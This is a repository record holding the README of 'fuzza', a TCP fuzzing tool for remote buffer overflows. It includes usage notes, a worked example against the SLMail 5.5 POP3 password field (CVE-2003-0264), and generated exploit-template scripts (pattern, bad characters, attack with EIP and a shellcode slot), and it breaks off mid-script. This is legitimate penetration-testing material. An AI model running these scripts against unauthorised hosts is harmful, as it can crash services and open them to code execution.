{"id":15647234,"url":"https://github.com/cytopia/fuzza","last_synced_at":"2025-04-30T11:15:16.133Z","repository":{"id":57432721,"uuid":"234789287","full_name":"cytopia/fuzza","owner":"cytopia","description":"Customizable TCP fuzzing tool to test for remote buffer overflows.","archived":false,"fork":false,"pushed_at":"2020-04-16T06:59:37.000Z","size":106,"stargazers_count":48,"open_issues_count":0,"forks_count":8,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-03-30T15:36:47.066Z","etag":null,"topics":["buffer-overflow","buffer-overflow-attack","cytopia-sec","fuzzer","fuzzers","fuzzing"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/cytopia.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2020-01-18T19:52:31.000Z","updated_at":"2025-02-27T07:39:39.000Z","dependencies_parsed_at":"2022-09-19T07:00:25.485Z","dependency_job_id":null,"html_url":"https://github.com/cytopia/fuzza","commit_stats":null,"previous_names":[],"tags_count":8,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cytopia%2Ffuzza","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cytopia%2Ffuzza/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cytopia%2Ffuzza/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cytopia%2Ffuzza/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/cytopia","download_url":"https://codeload.github.com/cytopia/fuzza/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":251687596,"owners_count":21627597,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["buffer-overflow","buffer-overflow-attack","cytopia-sec","fuzzer","fuzzers","fuzzing"],"created_at":"2024-10-03T12:17:35.974Z","updated_at":"2025-04-30T11:15:16.092Z","avatar_url":"https://github.com/cytopia.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# fuzza\n\n[![](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black)\n[![PyPI](https://img.shields.io/pypi/v/fuzza)](https://pypi.org/project/fuzza/)\n[![PyPI - Status](https://img.shields.io/pypi/status/fuzza)](https://pypi.org/project/fuzza/)\n[![PyPI - Python Version](https://img.shields.io/pypi/pyversions/fuzza)](https://pypi.org/project/fuzza/)\n[![PyPI - Format](https://img.shields.io/pypi/format/fuzza)](https://pypi.org/project/fuzza/)\n[![PyPI - Implementation](https://img.shields.io/pypi/implementation/fuzza)](https://pypi.org/project/fuzza/)\n[![PyPI - License](https://img.shields.io/pypi/l/fuzza)](https://pypi.org/project/fuzza/)\n\n[![Build Status](https://github.com/cytopia/fuzza/workflows/linting/badge.svg)](https://github.com/cytopia/fuzza/actions?workflow=linting)\n[![Build Status](https://github.com/cytopia/fuzza/workflows/testing/badge.svg)](https://github.com/cytopia/fuzza/actions?workflow=testing)\n[![Build Status](https://github.com/cytopia/fuzza/workflows/building/badge.svg)](https://github.com/cytopia/fuzza/actions?workflow=building)\n\nCustomizable TCP fuzzing tool to test for remote buffer overflows.\n\n`fuzza` is able to send and receive any initial commands prior sending the payload as well as\nsending any post commands after the payload has been sent. In order to replicate and triage the\nbuffer overflow, `fuzza` can be used to generate custom python scripts for attack, badchars and\nfinding the eip based on your command line arguments. See examples for more details.\n\n\n## :tada: Installation\n```bash\npip install fuzza\n```\n\n\n## :star: Features\n\n* Works similar to [generic_send_tcp](https://www.codeproject.com/articles/19307/generic-tcp-ip-client-server), but instructions are specified via command line arguments\n* Has an [expect](https://linux.die.net/man/1/expect)-like feature to wait for a specific response which also supports regex\n* Generates custom Python scripts based on your command line arguments to triage the overflow\n* Works with Python2 and Python3\n\n\n## :computer: Usage\n```bash\n$ fuzza --help\n\nusage: fuzza [options] host port\n fuzza --help\n fuzza --version\n\nCustomizable TCP fuzzing tool to test for remote buffer overflows.\n\nIt works in two different modes: normal and generate. Normal mode will send your payload\nto a remote endpoint and increase the payload size each round in order to try to crash the\nservice. The generate mode however will generate three easy to use python scripts to\nfurther triage any potential buffer overflow manually.\n\npositional arguments:\n host IP or hostname to connect to.\n port Port to connect to.\n\noptional arguments:\n -h, --help show this help message and exit\n -v, --version Show version information,\n -c char, --char char Buffer character to send as payload. Default: \"A\"\n -p str, --prefix str Prefix string to prepend to buffer. Empty by default.\n -s str, --suffix str Suffix string to append to buffer. Empty by default.\n -l int, --length int Initial length to concat buffer string with x*char.\n When using the '-g' option to generate reproducible attack scripts set this\n to the value at which the crash occured in order to pre-populate the\n generated scripts. Default: 100\n -m int, --multiply int\n Round multiplier to concat buffer string with x*char every round.\n Default: 100\n -i str, --init str If specified, initializes communication before sending the payload in the\n form '\u003csend\u003e:\u003cexpect\u003e,\u003csend\u003e:\u003cexpect\u003e,...'. Where \u003csend\u003e is the data to be\n sent to the server and \u003cexpect\u003e is the answer to be received from the\n server. Either one of \u003csend\u003e or \u003cexpect\u003e can be omitted if you expect\n something without having sent data yet or need to send something for which\n there will not be an answer. Multiple \u003csend\u003e:\u003cexpect\u003e are supported and\n must be separated by a comma.\n Regex supported for \u003cexpect\u003e part.\n -e str, --exit str If specified, finalizes communication after sending the payload in the\n form '\u003csend\u003e:\u003cexpect\u003e,\u003csend\u003e:\u003cexpect\u003e,...'. Where \u003csend\u003e is the data to be\n sent to the server and \u003cexpect\u003e is the answer to be received from the\n server. Either one of \u003csend\u003e or \u003cexpect\u003e can be omitted if you expect\n something without having sent data yet or need to send something for\n which there will not be an answer. Multiple \u003csend\u003e:\u003cexpect\u003e are supported\n and must be separated by a comma.\n Regex supported for \u003cexpect\u003e part.\n -t float, --timeout float\n Timeout in sec for receiving data before declaring the endpoint as crashed.\n Default: 30.0\n -d float, --delay float\n Delay in seconds between each round. Default: 1.0\n -g dir, --generate dir\n Generate custom python scripts based on your command line arguments\n to reproduce and triage the overflow. Requires a directory to be\n specified where to save the scripts to.\n\nexample:\n\n The following example illustrates how to use the initial communication by:\n 1. Expecting the POP3 server banner\n 2. Sending 'USER bob'\n 3. Expecting a welcome message\n Additionally before sending the fuzzing characters, it is prepended with 'PASS ',\n so that the actuall fuzzing can be done on the password:\n 1. Prefix payload with 'PASS '\n 2. Send payload\n Lastly in order to also close the connection the '-e' opton is used\n (which works exactly as '-i') in order to send data after the payload.\n 1. Expect any response from password payload\n 2. Terminate the connection via QUIT\n 3. Do not expect a follow up response\n $ fuzza -i ':.*POP3.*,USER bob\\r\\n:.*welcome.*' -e ':.*,QUIT:' -p 'PASS ' -s '\\r\\n'\n\nVisit https://github.com/cytopia/fuzza for more examples.\n```\n\n\n## :zap: Modes\n\n### Normal\n\nIn normal mode you can communicate with a network service and specify at which stage of the\ncommunication to send an increasing buffer.\n\nThe following example sends an ever increasing buffer to host.example.tld at port 4444:\n```bash\n$ fuzza host.example.tld 4444\n```\n\nThe following example connects to an IMAP service, waits for its banner and tries to overflow\nthe password value of `a LOGIN \u003cuser\u003e \u003cpass\u003e`:\n```bash\n$ fuzza -i ':.*' -p 'a LOGIN bob ' -s '\\r\\n' host.example.tld 143\n```\n\n### Generate\n\nIf you have found a potential buffer overflow, it is time to generate your triage scripts with the\nsame parameter used for finding the overflow.\n\nIn the following example you have found a buffer overflow on host.example.tld at port 4444 at\n300 characters and can start to generate your files:\n```bash\n$ fuzza host.example.tld 4444 -l 300 -g output/\n```\n\nThe scripts will be pre-populated with any command line arguments specified.\n\n\n#### `pattern.py`\n\nThis is the first script you will want to use. It is already pre-populated with characters from\n`pattern_create.rb` at length 300. There is no modification required. Simply start your debugger\nof choice, watch your application and run `pattern.py` without any arguments. Whatever ends up in\nyour EIP can be thrown into `pattern_offset.rb` and you have the length of the overflow.\n```python\n#!/usr/bin/env python\n\"\"\"fuzza autogenerated.\"\"\"\n\nfrom __future__ import print_function\nimport socket\n\ndef str2b(data):\n \"\"\"Unescape P2/P3 and convert to bytes if Python3.\"\"\"\n # Python2: Unescape control chars\n try:\n return data.decode('string_escape')\n except AttributeError:\n pass\n except UnicodeDecodeError:\n pass\n # Python3: Unescape control chars and convert to byte\n try:\n return data.encode(\"utf-8\").decode('unicode-escape').encode(\"latin1\")\n except UnicodeDecodeError:\n pass\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\npattern = (\n \"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9\"\n \"Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9\"\n \"Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9\"\n \"Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9\"\n) # 300 bytes from pattern_create.rb\n\nprint('Trying to send %s bytes unique chars...' % (str(len(pattern))))\ntry:\n s.connect(('host.example.tld', 4444))\n s.send(str2b('' + pattern + ''))\n print('done')\nexcept:\n print('Could not connect')\ns.close()\n```\n\nNext thing you will want to do is to adjust the `len_overflow` variable in `badchars.py` and\n`attack.py` with the value you found via `pattern_offset.rb`\n\n\n#### `badchars.py`\n\nThis script will help you to identify any characters that are squashed or truncated in memory, ie.\nthe bad characters that cannot be used for the payload.\n\nBefore running it, remember to adjust the `len_overflow` variable.\n\n```python\n#!/usr/bin/env python\n\"\"\"fuzza autogenerated.\"\"\"\n\nfrom __future__ import print_function\nimport socket\n\ndef str2b(data):\n \"\"\"Unescape P2/P3 and convert to bytes if Python3.\"\"\"\n # Python2: Unescape control chars\n try:\n return data.decode('string_escape')\n except AttributeError:\n pass\n except UnicodeDecodeError:\n pass\n # Python3: Unescape control chars and convert to byte\n try:\n return data.encode(\"utf-8\").decode('unicode-escape').encode(\"latin1\")\n except UnicodeDecodeError:\n pass\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nlen_overflow = 300 # Use pattern_create.rb and pattern_offset.rb to find exact offset\neip = \"B\"*4 # Ignore for badchar detection\nbadchars = (\n \"\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\\x0e\\x0f\\x10\"\n \"\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\\x1e\\x1f\\x20\"\n \"\\x21\\x22\\x23\\x24\\x25\\x26\\x27\\x28\\x29\\x2a\\x2b\\x2c\\x2d\\x2e\\x2f\\x30\"\n \"\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x3a\\x3b\\x3c\\x3d\\x3e\\x3f\\x40\"\n \"\\x41\\x42\\x43\\x44\\x45\\x46\\x47\\x48\\x49\\x4a\\x4b\\x4c\\x4d\\x4e\\x4f\\x50\"\n \"\\x51\\x52\\x53\\x54\\x55\\x56\\x57\\x58\\x59\\x5a\\x5b\\x5c\\x5d\\x5e\\x5f\\x60\"\n \"\\x61\\x62\\x63\\x64\\x65\\x66\\x67\\x68\\x69\\x6a\\x6b\\x6c\\x6d\\x6e\\x6f\\x70\"\n \"\\x71\\x72\\x73\\x74\\x75\\x76\\x77\\x78\\x79\\x7a\\x7b\\x7c\\x7d\\x7e\\x7f\\x80\"\n \"\\x81\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8d\\x8e\\x8f\\x90\"\n \"\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b\\x9c\\x9d\\x9e\\x9f\\xa0\"\n \"\\xa1\\xa2\\xa3\\xa4\\xa5\\xa6\\xa7\\xa8\\xa9\\xaa\\xab\\xac\\xad\\xae\\xaf\\xb0\"\n \"\\xb1\\xb2\\xb3\\xb4\\xb5\\xb6\\xb7\\xb8\\xb9\\xba\\xbb\\xbc\\xbd\\xbe\\xbf\\xc0\"\n \"\\xc1\\xc2\\xc3\\xc4\\xc5\\xc6\\xc7\\xc8\\xc9\\xca\\xcb\\xcc\\xcd\\xce\\xcf\\xd0\"\n \"\\xd1\\xd2\\xd3\\xd4\\xd5\\xd6\\xd7\\xd8\\xd9\\xda\\xdb\\xdc\\xdd\\xde\\xdf\\xe0\"\n \"\\xe1\\xe2\\xe3\\xe4\\xe5\\xe6\\xe7\\xe8\\xe9\\xea\\xeb\\xec\\xed\\xee\\xef\\xf0\"\n \"\\xf1\\xf2\\xf3\\xf4\\xf5\\xf6\\xf7\\xf8\\xf9\\xfa\\xfb\\xfc\\xfd\\xfe\\xff\"\n)\n\nbuffer = \"A\"*len_overflow + eip + badchars\n\nprint('Trying to send %s bytes buffer...' % (str(len(buffer))))\ntry:\n s.connect(('host.example.tld', 4444))\n s.send(str2b('' + buffer + ''))\n print('done')\nexcept:\n print('Could not connect')\ns.close()\n```\n\n\n#### `attack.py`\n\nIn this script everything comes together and you can:\n1. Adjust the overflow length\n2. Adjust the nop sled length\n3. Set EIP address\n4. Add shellcode\n5. Add padding\n\nThere is also not much to write, as you just need to fill variables and most other stuff is simply\nauto-calculated.\n```python\n#!/usr/bin/env python\n\"\"\"fuzza autogenerated.\"\"\"\n\nfrom __future__ import print_function\nimport socket\n\ndef str2b(data):\n \"\"\"Unescape P2/P3 and convert to bytes if Python3.\"\"\"\n # Python2: Unescape control chars\n try:\n return data.decode('string_escape')\n except AttributeError:\n pass\n except UnicodeDecodeError:\n pass\n # Python3: Unescape control chars and convert to byte\n try:\n return data.encode(\"utf-8\").decode('unicode-escape').encode(\"latin1\")\n except UnicodeDecodeError:\n pass\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nlen_total = 300 # Start at len_overflow and try out how much can be overwritten\nlen_overflow = 296 # Use pattern_create.rb and pattern_offset.rb to find exact offset\nlen_nop_sled = 0 # Add x bytes of nops before shellcode for shellcode decoding\neip = \"\\x42\\x42\\x42\\x42\" # Change this (Keep in mind to put address in reverse order)\nshellcode = \"\"\n\npadding = \"C\"*(len_total - len_overflow - len(str(eip)) - len_nop_sled - len(shellcode))\nbuffer = \"A\"*len_overflow + eip + \"\\x90\"*len_nop_sled + shellcode + padding\n\nprint('Trying to send %s bytes buffer...' % (str(len(buffer))))\ntry:\n s.connect(('host.example.tld', 4444))\n s.send(str2b('' + buffer + ''))\n print('done')\nexcept:\n print('Could not connect')\ns.close()\n```\n\n\n## :bulb: Examples\n\n### SLMail 5.5 Buffer overflow\n\n#### Overview\n\n* [CVE-2003-0264](https://www.cvedetails.com/cve/CVE-2003-0264/) - buffer overflow in password.\n\nTo see how the raw communication works, have a look at the following netcat snippet:\n```bash\n$ nc mail.example.tld 110\n+OK POP3 server mail.example.tld ready \u003c00001.544405549@mail.example.tld\u003e\nUSER test\n+OK test welcome here\nPASS LongPassword\n-ERR unable to lock mailbox\nQUIT\n```\n\n#### Find potential overflow length\n\nIn order to fuzz the password, all previous communication must have happened. By using `fuzza`,\nthis can be achieved with the `-i` argument to specify initial data to be send and received.\nAdditionally we also want to close the connection after sending the payload (if possible).\nThis can be achieved with the `-e` option which works exactly as `-i`.\n```bash\n$ fuzza -i ':.*OK POP3.*,USER test\\r\\n:.*test welcome.*' -p 'PASS ' -s '\\r\\n' -e ':.*,QUIT\\r\\n:' mail.example.tld 110\n\n------------------------------------------------------------\nA * 100\n------------------------------------------------------------\nInit Awaiting: \".*OK POP3.*\"\nInit Received: \"+OK POP3 server mail.example.tld ready \u003c00005.544236132@mail.example.tld\u003e\"\nInit Sending: \"USER test\\r\\n\"\nInit Awaiting: \"test welcome\"\nInit Received: \"+OK test welcome here\"\nSending Payload: \"PASS \" + \"A\"*100 + \"\\r\\n\"\nExit Awaiting: \".*\"\nExit Received: \"-ERR unable to lock mailbox\"\nExit Sending: \"QUIT\\r\\n\"\n...\n\n------------------------------------------------------------\nA * 2700\n------------------------------------------------------------\nInit Awaiting: \".*OK POP3.*\"\nInit Received: \"+OK POP3 server mail.example.tld ready \u003c00005.544236132@mail.example.tld\u003e\"\nInit Sending: \"USER test\\r\\n\"\nInit Awaiting: \"test welcome\"\nInit Received: \"+OK test welcome here\"\nSending Payload: \"PASS \" + \"A\"*2700 + \"\\r\\n\"\nExit Awaiting: \".*\"\n\nRemote service (most likely) crashed at 2700 bytes of \"A\"\nPayload sent:\nPASS AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n```\n\n#### Generate triaging scripts\n\nNow that you know the application is potentially vulnerable at or before 2700 bytes, you will have\nto try to replicate and triage the buffer overflow. In order to do so, you can use `fuzza` to\nautomatically generate triaging scripts based on your current arguments and findings.\n\nUse the same arguments as before, add the initial length of 2700 bytes (`-l 2700`) and specify\nan output directory (`-g \u003cpath\u003e`):\n```bash\n$ fuzza -i ':.*OK POP3.*,USER test\\r\\n:.*test welcome.*' -p 'PASS ' -s '\\r\\n' -e ':.*,QUIT\\r\\n:' -l 2700 -g out/ mail.example.tld 110\n```\n`fuzza` will then generate three files in `out/` directory based on your command line arguments:\n\n1. `attack.py` - used to replicate and triage buffer overflow\n2. `pattern.py` - used to find offset for EIP\n3. `badchars.py` - used to find any bad characters for the exploit shellcode\n\nBased on the above specified command line arguments, the triaging scripts will look as follows:\n\n**`attack.py`**\n```python\n#!/usr/bin/env python\n\"\"\"fuzza autogenerated.\"\"\"\n\nfrom __future__ import print_function\nimport socket\n\ndef str2b(data):\n \"\"\"Unescape P2/P3 and convert to bytes if Python3.\"\"\"\n # Python2: Unescape control chars\n try:\n return data.decode('string_escape')\n except AttributeError:\n pass\n except UnicodeDecodeError:\n pass\n # Python3: Unescape control chars and convert to byte\n try:\n return data.encode(\"utf-8\").decode('unicode-escape').encode(\"latin1\")\n except UnicodeDecodeError:\n pass\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nlen_total = 2700 # Start at len_overflow and try out how much can be overwritten\nlen_overflow = 2696 # Use pattern_create.rb and pattern_offset.rb to find exact offset\nlen_nop_sled = 0 # Add x bytes of nops before shellcode for shellcode decoding\neip = \"\\x42\\x42\\x42\\x42\" # Change this (Keep in mind to put address in reverse order)\nshellcode = \"\"\n\npadding = \"C\"*(len_total - len_overflow - len(str(eip)) - len_nop_sled - len(shellcode))\nbuffer = \"A\"*len_overflow + eip + \"\\x90\"*len_nop_sled + shellcode + padding\n\nprint('Trying to send %s bytes buffer...' % (str(len(buffer))))\ntry:\n s.connect(('mail.example.tld', 110))\n s.recv(1024)\n s.send(str2b('USER test\\r\\n'))\n s.recv(1024)\n s.send(str2b('PASS ' + buffer + '\\r\\n'))\n s.recv(1024)\n s.send(str2b('QUIT\\r\\n'))\n print('done')\nexcept:\n print('Could not connect')\ns.close()\n```\n\n**`pattern.py`**\n```python\n#!/usr/bin/env python\n\"\"\"fuzza autogenerated.\"\"\"\n\nfrom __future__ import print_function\nimport socket\n\ndef str2b(data):\n \"\"\"Unescape P2/P3 and convert to bytes if Python3.\"\"\"\n # Python2: Unescape control chars\n try:\n return data.decode('string_escape')\n except AttributeError:\n pass\n except UnicodeDecodeError:\n pass\n # Python3: Unescape control chars and convert to byte\n try:\n return data.encode(\"utf-8\").decode('unicode-escape').encode(\"latin1\")\n except UnicodeDecodeError:\n pass\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\npattern = (\n \"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9\"\n \"Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9\"\n \"Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9\"\n \"Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9\"\n \"Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9\"\n \"Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9\"\n \"As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9\"\n \"Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9\"\n \"Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9\"\n \"Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9\"\n \"Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9\"\n \"Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9\"\n \"Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9\"\n \"Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9\"\n \"Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9\"\n \"Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9\"\n \"Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9\"\n \"Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9\"\n \"Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9\"\n \"Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9\"\n \"Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9\"\n \"Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9\"\n \"Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9\"\n \"Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9\"\n \"Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9\"\n \"Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9\"\n \"Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9\"\n \"Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9\"\n \"Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9\"\n \"Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9\"\n) # 2700 bytes from pattern_create.rb\n\nprint('Trying to send %s bytes unique chars...' % (str(len(pattern))))\ntry:\n s.connect(('mail.example.tld', 110))\n s.recv(1024)\n s.send(str2b('USER test\\r\\n'))\n s.recv(1024)\n s.send(str2b('PASS ' + pattern + '\\r\\n'))\n s.recv(1024)\n s.send(str2b('QUIT\\r\\n'))\n print('done')\nexcept:\n print('Could not connect')\ns.close()\n```\n\n**`badchars.py`**\n```python\n#!/usr/bin/env python\n\"\"\"fuzza autogenerated.\"\"\"\n\nfrom __future__ import print_function\nimport socket\n\ndef str2b(data):\n \"\"\"Unescape P2/P3 and convert to bytes if Python3.\"\"\"\n # Python2: Unescape control chars\n try:\n return data.decode('string_escape')\n except AttributeError:\n pass\n except UnicodeDecodeError:\n pass\n # Python3: Unescape control chars and convert to byte\n try:\n return data.encode(\"utf-8\").decode('unicode-escape').encode(\"latin1\")\n except UnicodeDecodeError:\n pass\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nlen_overflow = 2700 # Use pattern_create.rb and pattern_offset.rb to find exact offset\neip = \"B\"*4 # Ignore for badchar detection\nbadchars = (\n \"\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\\x0e\\x0f\\x10\"\n \"\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\\x1e\\x1f\\x20\"\n \"\\x21\\x22\\x23\\x24\\x25\\x26\\x27\\x28\\x29\\x2a\\x2b\\x2c\\x2d\\x2e\\x2f\\x30\"\n \"\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x3a\\x3b\\x3c\\x3d\\x3e\\x3f\\x40\"\n \"\\x41\\x42\\x43\\x44\\x45\\x46\\x47\\x48\\x49\\x4a\\x4b\\x4c\\x4d\\x4e\\x4f\\x50\"\n 